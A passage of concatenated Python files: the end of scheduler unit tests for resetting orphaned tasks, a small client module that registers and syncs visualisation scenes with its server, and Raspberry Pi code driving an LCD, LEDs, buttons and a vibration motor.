self.assertEqual(State.SCHEDULED, ti1.state)
self.assertEqual(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
"""Make sure a task in an orphaned state is not reset if it has no dagrun. """
dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
session.add(ti)
session.commit()
ti.refresh_from_db()
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
dag_id = 'test_reset_orphaned_tasks_no_orphans'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
tis = dr1.get_task_instances(session=session)
tis[0].state = State.RUNNING
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
tis[0].refresh_from_db()
self.assertEqual(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
"""Ensure orphaned tasks with non-running dagruns are not reset."""
dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
tis = dr1.get_task_instances(session=session)
self.assertEqual(1, len(tis))
tis[0].state = State.SCHEDULED
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
"""Create dagruns and esnure only ones with correct states are reset."""
prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
dag = DAG(dag_id=prefix,
start_date=DEFAULT_DATE,
schedule_interval="@daily")
tasks = []
for i in range(len(states)):
task_id = "{}_task_{}".format(prefix, i)
task = DummyOperator(task_id=task_id, dag=dag)
tasks.append(task)
scheduler = SchedulerJob()
session = settings.Session()
# create dagruns
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
dr2.state = State.SUCCESS
session.merge(dr1)
session.merge(dr2)
session.commit()
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
self.assertIsNone(ti.state)
else:
self.assertEqual(state, ti.state)
# otherwise not
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
session.close()
|
__init__.py
|
"""
low level API
consider using higher level containers package instead this one
"""
import multiprocessing
import collections
import time
import abc
import inspect
import alvi.client.data_generators
from .. import utils
API_URL_SCENE_SYNC = 'api/scene/sync'
API_URL_SCENE_REGISTER = 'api/scene/register'
class SubsequenceIDGenerator:
"""
generates deterministic (in particular subsequent) IDs for subsequent objects
"""
def __init__(self):
self._cache = dict()
def __call__(self, obj):
return self._cache.setdefault(id(obj), len(self._cache))
class Pipe:
def __init__(self, scene_instance_id, id_generator=None):
self._scene_instance_id = scene_instance_id
self._backlog = collections.OrderedDict()
self._id_generator = id_generator if id_generator else SubsequenceIDGenerator()
def send(self, action_type, key, args):
message = dict(
type=action_type,
args=args
)
key = (action_type, ) + key
self._backlog[repr(key)] = message
def sync(self):
if not self._backlog:
return
data = dict(
instance_id=self._scene_instance_id,
messages=list(self._backlog.values()),
)
utils.post_to_server(API_URL_SCENE_SYNC, data)
self._backlog = self._backlog.__class__() # python 3.2 does not support clear() on dicts
time.sleep(1)
def generate_id(self, obj):
return self._id_generator(obj)
class BaseScene(metaclass=abc.ABCMeta):
@classmethod
def start(cls):
while True:
available_generators = dict(list(
(name, generator.Form().as_p()) for name, generator in alvi.client.data_generators.generators.items()
))
#TODO send this data just once
post_data = dict(
name=cls.__name__,
container=cls.container_name(),
source=inspect.getsource(cls),
form=cls.Form().as_p(),
available_generators=available_generators,
)
response = utils.post_to_server(API_URL_SCENE_REGISTER, post_data)
scene_instance_id = response['scene_instance_id']
options = response['options']
q = multiprocessing.Queue()
process = multiprocessing.Process(target=cls.create_instance, args=(q, ))
process.start()
q.put(scene_instance_id)
q.put(options)
@classmethod
def create_instance(cls, q):
instance_id = q.get()
options = q.get()
scene = cls()
pipe = Pipe(instance_id)
cls.run_wrapper(
scene,
pipe,
options=options,
data_generator=alvi.client.data_generators.make_data_generator(options),
)
pipe.send('finish', (0, ), {})
pipe.sync()
@classmethod
def run_wrapper(cls, scene, pipe, **kwargs):
scene.run(pipe, **kwargs)
@abc.abstractmethod
def run(self, **kwargs):
raise NotImplementedError
@classmethod
@abc.abstractmethod
def container_name(cls):
raise NotImplementedError
|
hw.py
|
# ------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
"""
TODO module description
"""
import datetime
import logging
import logging.handlers
# TODO Is UnresolvedImport needed? hw.py should not be enabled on a non-Pi; same for LCD below.
import pibrella # @UnresolvedImport when not on R-Pi
import signal
import sys
from time import sleep
from threading import Thread
from threading import Event
import traceback
import math
import operator
import Queue
import Adafruit_CharLCD as LCD # @UnresolvedImport when not on R-Pi
#tried various installs finally got working but seems too complex
import sys
sys.path.append('/opt/designchallenge2015/Adafruit-Raspberry-Pi-Python-Code/Adafruit_PWM_Servo_Driver')
from Adafruit_PWM_Servo_Driver import PWM
from interfaces import IDisplay
from interfaces import ILed
from interfaces import IPushButtonMonitor
from interfaces import IVibrationMotor
from interfaces import IBuzzer
from interfaces import IInput
from interfaces import IUrgencyLed
from station.util import Config
from station.util import PushButton
from mido import MidiFile
import os
from enum import Enum
# ------------------------------------------------------------------------------
class Display(IDisplay):
"""
TODO class comment
"""
COLORS = {"BLACK": (0.0, 0.0, 0.0), # backlight off
"RED": (1.0, 0.0, 0.0),
"GREEN": (0.0, 1.0, 0.0),
"BLUE": (0.0, 0.0, 1.0),
"CYAN": (0.0, 1.0, 1.0),
"MAGENTA": (1.0, 0.0, 1.0),
"YELLOW": (1.0, 1.0, 0.0),
"WHITE": (1.0, 1.0, 1.0),
}
# --------------------------------------------------------------------------
def __init__(self,
config):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Constructing display')
self._line1Text = ''
self._line2Text = ''
self._lineWidth = config.lineWidth
logger.debug('Display line width: {} chars'.format(self._lineWidth))
self._lcd = LCD.Adafruit_CharLCDPlate()
# --------------------------------------------------------------------------
def __enter__(self):
""" Called when the context of a "with" statement is entered
Returns:
Reference to self
"""
logger.debug('Entering display')
return self
# --------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
""" Called when the context of a "with" statement is exited
Clears the display text and hides the cursor. The backlight is left in its
current state.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Exiting display')
self.setText('')
self.showCursor(False) # must call after setText(), which displays the cursor
# --------------------------------------------------------------------------
def lineWidth(self):
""" Returns: the number of columns in a line of the display.
"""
return self._lineWidth
# --------------------------------------------------------------------------
def setBgColor(self,
color):
''' Set the display background color to the specified color.
Sets the display backlight to the color specified by the color name parameter.
The valid color names are "BLACK", "RED", "GREEN", "BLUE", "CYAN", "YELLOW",
"MAGENTA", "WHITE".
Raises:
KeyError if color is not one of the valid color string values.
'''
self._lcd.set_color(*self.COLORS[color])
# --------------------------------------------------------------------------
def setLine1Text(self,
text):
"""Sets the text for line 1 of the display.
Sets the text for line 1 of the display. If the text is too long to fit
on the display, then the text scrolls over time.
Args:
text (string): The text to display.
"""
self._line1Text = "{:<{width}}".format(text, width=self._lineWidth)
#logger.debug('Setting Line 1 text to "%s"' % self._line1Text)
self._refreshDisplay()
# --------------------------------------------------------------------------
def setLine2Text(self,
text):
"""Sets the text for line 2 of the display.
Sets the text for line 2 of the display. If the text is too long to fit
on the display, then the text scrolls over time.
Args:
text (string): The text to display.
"""
self._line2Text = "{:<{width}}".format(text, width=self._lineWidth)
#logger.debug('Setting Line 2 text to "%s"' % self._line2Text)
self._refreshDisplay()
# --------------------------------------------------------------------------
def setText(self,
text):
""" Sets the text for the entire display.
Directly sets the text for the display. Multiple lines can be provided
at once by separating with a '\n' character. The first two lines will
be displayed. Other lines will be discarded.
Args:
text (string): The text to display.
"""
lines = (text+'\n').split('\n')
self.setLine1Text(lines[0])
self.setLine2Text(lines[1])
self._refreshDisplay()
# --------------------------------------------------------------------------
def showCursor(self, show=True):
""" Shows or hides the cursor.
Make the cursor visible if show is True. Otherwise, make the cursor
invisible.
"""
#logger.debug('Setting show cursor value to %s' % (show))
self._lcd.blink(show)
self._lcd.show_cursor(show)
# --------------------------------------------------------------------------
def setCursor(self, row=0, col=0):
""" Sets the position of the cursor and makes it visible.
"""
#logger.debug('Setting cursor position to (r=%s, c=%s)' % (row, col))
self._lcd.set_cursor(col, row)
self.showCursor()
# --------------------------------------------------------------------------
def _refreshDisplay(self):
""" Sends text to the display
Sends or resends the text stored in _line1Text and _line2Text to
the display. Also causes the cursor to be displayed.
"""
self.setCursor(0, 0)
self._lcd.message(self._line1Text + '\n' + self._line2Text)
#logger.debug('Display now reads "%s"[br]"%s"' % (self._line1Text, self._line2Text))
# ------------------------------------------------------------------------------
class LedType(Enum):
pibrella = 1
adafruit = 2
class I2CLedWorkerThreadCmd():
def __init__(self, startPercentageOn, endPercentageOn, durationInSeconds):
# Note duration of 0 = indefinitely
self.startPercentageOn = startPercentageOn
self.endPercentageOn = endPercentageOn
self.durationInSeconds = durationInSeconds
class I2CLedWorkerThread(Thread):
""" A worker thread that controls an led light over a period of time.
This is done this way to exploit the queue waiting which takes less
cpu time than sleeping to help avoid thrashing with many of these
running concurrently. It was adapted form the public domain work:
http://eli.thegreenplace.net/2011/12/27/python-threads-communication-and-stopping
TaskMaster must support the following:
setLed(newPercentBrightness) to allow reach back to control light level
cmds which is a Queue of I2CLedWorkerThreadCmd objects.
The thread has a fixed periodicity which once hit will start the
next available command if no new command it will keep doing what it
was doing.
Ask the thread to stop by calling its join() method to clean up before
exiting the application. __exit__ should be called to catch this but
currently it appears to not always be called.
"""
def __init__(self, taskMaster):
super(I2CLedWorkerThread, self).__init__()
self._taskMaster = taskMaster
# init variables for supporting dynamic lighting changes
self._currentBrightness = 0
self._endBrightness = 0
self._stepsRemaining = 0
# Set minimum time step between changes
self._TIME_TICK = 0.001 # note 0.0001 is possible but CPU thrashes
self._delta = self._TIME_TICK
self._isChanging = False
self.stoprequest = Event()
def run(self):
# As long as we weren't asked to stop, try to take new tasks from the
# queue. The tasks are taken with a blocking 'get', so no CPU
# cycles are wasted while waiting.
# Also, 'get' is given a timeout, so stoprequest is always checked,
# even if there's nothing in the queue.
while not self.stoprequest.isSet():
try:
nextCmd = self._taskMaster.cmds.get(True,self._TIME_TICK)
# if no cmd keep doing what you were doing even if was nothing
# by taking the exception path on the timeout
# otherwise process the new command and reset the thread state
self._isChanging = True
self._currentBrightness = nextCmd.startPercentageOn / 100.0
self._endBrightness = nextCmd.endPercentageOn / 100.0
if nextCmd.durationInSeconds > self._TIME_TICK:
# note early python ceil could return float
self._stepsRemaining = int(math.ceil(nextCmd.durationInSeconds/self._TIME_TICK))
self._delta = (self._endBrightness - self._currentBrightness) / self._stepsRemaining
elif nextCmd.durationInSeconds == 0:
self._stepsRemaining = 0
self._currentBrightness = self._endBrightness
self._isChanging = False
else:
self._stepsRemaining = 1
self._taskMaster.setLed(self._currentBrightness)
except Queue.Empty:
if self._isChanging:
if self._stepsRemaining > 1:
self._currentBrightness = self._currentBrightness + self._delta
elif 1 == self._stepsRemaining:
self._currentBrightness = self._endBrightness
# Reached the base case for fade so terminate it
self._isChanging = False
# TODO handle if pulsing
# Reset values for next pulse cycle then treat like fade
self._stepsRemaining = self._stepsRemaining - 1
#self._pwm.setPWM(self._chan, 0, self._percentOnAsDecimalToGammaLevel(self._currentBrightness))
self._taskMaster.setLed(self._currentBrightness)
continue
def join(self, timeout=None):
self.stoprequest.set()
super(I2CLedWorkerThread, self).join(timeout)
class PibrellaLedFacade():
def __init__(self, chan, val, step, enabled):
self._val = int(math.floor(val)) # just in case is float and using 2.x
self._step = step # TODO so we really don't honor this right now
self._chan = chan
self.enabled = enabled
self._gamma = []
self._MAX_LEVEL = self._val
for i in range(self._MAX_LEVEL+1):
self._gamma.append(int(pow(i/(1.0*self._MAX_LEVEL), 2.8)*self._MAX_LEVEL))
initialValue = self._gamma[0]
if self.enabled:
initialValue = self._gamma[self._val]
self._pwm = PWM(0x40, debug=False)
self._pwm.setPWMFreq(400)
self._pwm.setPWM(self._chan, 0, initialValue)
self._isRunning = False
self.cmds = Queue.Queue()
#self._thread = I2CLedWorkerThread(self)
#self._thread.start()
def __exit__(self, type, value, traceback):
self.off()
if self._isRunning:
# stop was not called first so try to clean up
self.stop()
# --------------------------------------------------------------------------
def stop(self):
"""This MUST be called when your program is shutting down.
TODO Detailed multi-line description if
necessary.
This cleans up all of the thread processing and leaves the led off.
Note once stop is called on and off will work but fade and pulse
will no longer work.
TODO redo this threading model to allow cleaner working thread.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.info('Stopping LED.')
self.off()
self._isRunning = False
# self._thread.join()
def _percentOnAsDecimalToGammaLevel(self, valueFromZeroToOne):
# note use of int is for earlier python when floor could return float
gammaLevel = int(math.floor(self._MAX_LEVEL * valueFromZeroToOne))
gammaValue = 0
if gammaLevel >= 0 and gammaLevel <= self._MAX_LEVEL:
gammaValue = self._gamma[gammaLevel]
return gammaValue
def setLed(self, newPercentBrightness):
self._pwm.setPWM(self._chan, 0, self._percentOnAsDecimalToGammaLevel(newPercentBrightness))
def on(self):
#nextCmd = I2CLedWorkerThreadCmd(100,100,0)
#self.cmds.put(nextCmd)
self._val = self._MAX_LEVEL
self.enabled = True
self._pwm.setPWM(self._chan, 0, self._percentOnAsDecimalToGammaLevel(1))
def off(self):
#nextCmd = I2CLedWorkerThreadCmd(0,0,0)
#self.cmds.put(nextCmd)
self._val = 0
self.enabled = False
self._pwm.setPWM(self._chan, 0, self._percentOnAsDecimalToGammaLevel(0))
def fade(self, startPercentageOn, endPercentageOn, durationInSeconds):
#nextCmd = I2CLedWorkerThreadCmd(startPercentageOn, endPercentageOn, durationInSeconds)
#self.cmds.put(nextCmd)
self._pwm.setPWM(self._chan, 0, self._percentOnAsDecimalToGammaLevel(1))
def pulse(self, fadeInTime, fadeOutTime, onTime, offTime):
# TODO
pass
def decay(self):
""" Decay from full brightness to off
Each call updates the LED (if enabled) to go from full brightness to
off in smooth steps. True is returned if the LED is still on (non-zero
brightness). False is returned if the LED has decayed to off (zero)
brightness.
"""
if self.enabled:
if self._val >= self._step:
self._val = self._val - self._step
self._pwm.setPWM(self._chan, 0, self._gamma[self._val])
return True
else:
self._val = 0
self._pwm.setPWM(self._chan, 0, self._gamma[self._val])
self.enabled = False
return False
else:
# The value should already be off so why keep setting it?
#self._pwm.setPWM(self._chan, 0, self._gamma[0])
return False
# ------------------------------------------------------------------------------
class Led(ILed):
"""
TODO class comment
"""
# --------------------------------------------------------------------------
def __init__(self,
name,
config):
"""Initializes the LED class
TODO Detailed multi-line description if
necessary.
Args:
name (string): Name of this instance of the LED class. Example "Bob"
config (Config): Configuration object for the LED class
Returns:
N/A
Raises:
N/A
"""
self.Name = name
self.FlashingOnDuration_s = 0.5
self.FlashingOffDuration_s = 0.5
# Store results of what type of LED we are controlling
# default to pibrella
self._LedType = LedType.pibrella
if hasattr(config, 'LedType'):
if config.LedType.lower().startswith("adafruit"):
self._LedType = LedType.adafruit
if self._LedType == LedType.pibrella:
self.outputPin = getattr(pibrella.light, config.OutputPin)
else:
# TODO verify channel is valid
self.outputPin = PibrellaLedFacade(int(name), 4095, 16, False)
def stop(self):
if self._LedType == LedType.adafruit:
self.outputPin.stop()
# --------------------------------------------------------------------------
def turnOn(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
#logger.debug('Set LED steady ON \"%s\".', self.Name)
self.outputPin.on()
# --------------------------------------------------------------------------
def turnOff(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
#logger.debug('Set LED steady OFF \"%s\".', self.Name)
self.outputPin.off()
# --------------------------------------------------------------------------
def setFlashing(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Set LED flashing \"%s (%s..%s)\".',
self.Name,
self.FlashingOnDuration_s,
self.FlashingOffDuration_s)
# Pulse function, FadeInTime_s, FadeOutTime_s, OnTime_s, OffTime_s
self.outputPin.pulse(0, 0, self.FlashingOnDuration_s, self.FlashingOffDuration_s)
# --------------------------------------------------------------------------
def fade(self, startPercentageOn, endPercentageOn, durationInSeconds):
""" See interface definition
"""
self.outputPin.fade(startPercentageOn, endPercentageOn, durationInSeconds)
# --------------------------------------------------------------------------
def decay(self):
""" See interface definition
"""
self.outputPin.decay()
# ------------------------------------------------------------------------------
class PushButtonMonitor(IPushButtonMonitor):
"""
TODO class comment
"""
PRESSED = 1
RELEASED = -1
NEXT_STATE = (0, 1, 0, 3, 2, 3, 0, 3)
OUTPUT = (0, 0, 0, PRESSED, 0, 0, RELEASED, 0)
NUM_STATES = len(NEXT_STATE)
BUTTONS = (LCD.SELECT, LCD.RIGHT, LCD.DOWN, LCD.UP, LCD.LEFT)
NUM_BUTTONS = len(BUTTONS)
BUTTON_NAMES = ("SELECT", "RIGHT", "DOWN", "UP", "LEFT")
DEBOUNCE_INTERVAL = 0.05 # sec. (= sampling rate of 20 Hz)
# --------------------------------------------------------------------------
def __init__(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Constructing push button monitor')
self._device = None # button interface device
self._buttonStates = [0] * self.NUM_STATES # last sampled state of each button
self._debounceButtons = False # perform software debounce
self._pushButtons = {}
self._listening = False
self._timeToExit = False
self._onTickCallback = None
self._thread = Thread(target = self.run)
self._thread.daemon = True
self._thread.start()
# --------------------------------------------------------------------------
def setOnTickCallback(self, cb=None):
""" Attach a callback that gets called once per iteration of the button polling loop.
"""
self._onTickCallback = cb
# --------------------------------------------------------------------------
def setDevice(self, dev):
""" Register the hardware device for the push buttons.
"""
self._device = dev
# --------------------------------------------------------------------------
def __enter__(self):
logger.debug('Entering push button monitor')
return self
# --------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Exiting push button monitor')
self.stopListening()
self._timeToExit = True
self._thread.join()
# --------------------------------------------------------------------------
def startListening(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Starting listening for push button monitor')
# TODO
self._listening = True
# --------------------------------------------------------------------------
def stopListening(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Stopping listening for push button monitor')
self._listening = False
# --------------------------------------------------------------------------
def registerPushButton(self,
name,
buttonPressHandler,
config):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
# TODO[BEGIN]
keypress = config.HwKeyPress
if keypress in self._pushButtons:
logger.warning('Console key [%s] already registered to push button %s; redefining to register to push button %s' %
(keypress, self._pushButtons[keypress].Name, name))
self._pushButtons[keypress] = PushButton(name, buttonPressHandler)
logger.debug('Registered push button %s for key press [%s]' %
(name, keypress))
# TODO[END]
# --------------------------------------------------------------------------
def pollPushButtons(self):
""" Sample the current state of the push buttons, detect changes.
Poll the input buttons. Does a little debounce. Not sure if it is
necessary.
Button state transitions:
| button input
current state | 0 | 1
------------------------------------------------------------------
0 (released) | 0 | 1
1 (maybe pressed) | 0 | 3 (emit PRESSED)
3 (pressed) | 2 | 3
2 (maybe released) | 0 (emit RELEASED) | 3
"""
if self._debounceButtons:
# Sample the current state of all buttons
buttonInputs = map(self._device.is_pressed, self.BUTTONS)
# Convert prevState, input to an index = 2*state + input
buttonStateTransitions = map(lambda s,i: 2*s+(1 if i else 0), self._buttonStates, buttonInputs)
# Use the transition to lookup the next state
self._buttonStates = [self.NEXT_STATE[i] for i in buttonStateTransitions]
# Use the transition to lookup the output value
outputs = [self.OUTPUT[i] for i in buttonStateTransitions]
else:
outputs = map(self._device.is_pressed, self.BUTTONS)
# Make a list of buttons that changed to PRESSED and a list of buttons
# that changed to RELEASED
edges = ([i for i in range(self.NUM_BUTTONS) if outputs[i] == self.PRESSED],
[i for i in range(self.NUM_BUTTONS) if outputs[i] == self.RELEASED])
# Report the buttons that changed
if len(edges[0]):
self.deliverButtonPressEvents(edges[0])
if len(edges[1]):
self.deliverButtonReleaseEvents(edges[1])
# --------------------------------------------------------------------------
def deliverButtonPressEvents(self, buttons):
""" Call the push callback for buttons that were pressed
"""
for b in buttons:
button = self._pushButtons[self.BUTTON_NAMES[b]]
button.Handler(button.Name)
# --------------------------------------------------------------------------
def deliverButtonReleaseEvents(self, buttons):
""" Call the push callback for buttons that were pressed
There are no handlers defined for release events, so this method
does nothing.
"""
pass
# --------------------------------------------------------------------------
def onTick(self):
""" Calls user-supplied callback for each iteration of the polling loop.
Attach a custom callback by calling self.setOnTickCallback().
"""
if self._onTickCallback:
self._onTickCallback()
# --------------------------------------------------------------------------
def run(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
# with NonBlockingConsole() as nbc:
logger.debug('Starting key press thread for push button monitor')
while not self._timeToExit:
try:
if self._listening:
self.pollPushButtons()
self.onTick() # event callback for animation
sleep(self.DEBOUNCE_INTERVAL)
except Exception, e:
exType, ex, tb = sys.exc_info()
logger.critical("Exception occurred of type %s in push button monitor" % (exType.__name__))
logger.critical(str(e))
traceback.print_tb(tb)
# ------------------------------------------------------------------------------
class VibrationMotor(IVibrationMotor):
"""
TODO class comment
"""
# --------------------------------------------------------------------------
def __init__(self,
name,
outputPin):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
name (string): Name of this motor, example "Huey"
outputPin (string): Letter Designation of Pin , "E", "F", "G", or"H"
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
self.Name = name
#TODO - Need to get these from config file [SS]
#self.OnDuration_s = 0.5
#self.OffDuration_s = 0.5
self.outputPin = getattr(pibrella.output, outputPin)
# --------------------------------------------------------------------------
def __enter__(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Entering vibration motor %s', self.Name)
return self
# --------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Exiting vibration motor %s', self.Name)
self.stop()
# --------------------------------------------------------------------------
def start(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Started vibration motor \"%s\".', self.Name)
self.outputPin.on()
# --------------------------------------------------------------------------
def stop(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Stopped vibration motor \"%s\".', self.Name)
self.outputPin.off()
# ------------------------------------------------------------------------------
class UrgencyLed(IUrgencyLed):
# --------------------------------------------------------------------------
def __init__(self,
name,
outputPin):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
name (string): Name of this motor, example "Huey"
outputPin (string): Letter Designation of Pin , "E", "F", "G", or"H"
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
self.Name = name
logger.debug('Constructing urgency LED %s' % (self.Name))
#TODO - Need to get these from config file [SS]
self.min_period_ms = 300
self.max_period_ms = 2000
self.outputPin = getattr(pibrella.output, outputPin)
self._timeToExit = False
self._transitionToStarted = False
self._thread = Thread(target = self.run)
self._thread.daemon = True
self._thread.start()
# --------------------------------------------------------------------------
def __enter__(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Entering urgency LED %s', self.Name)
return self
# --------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
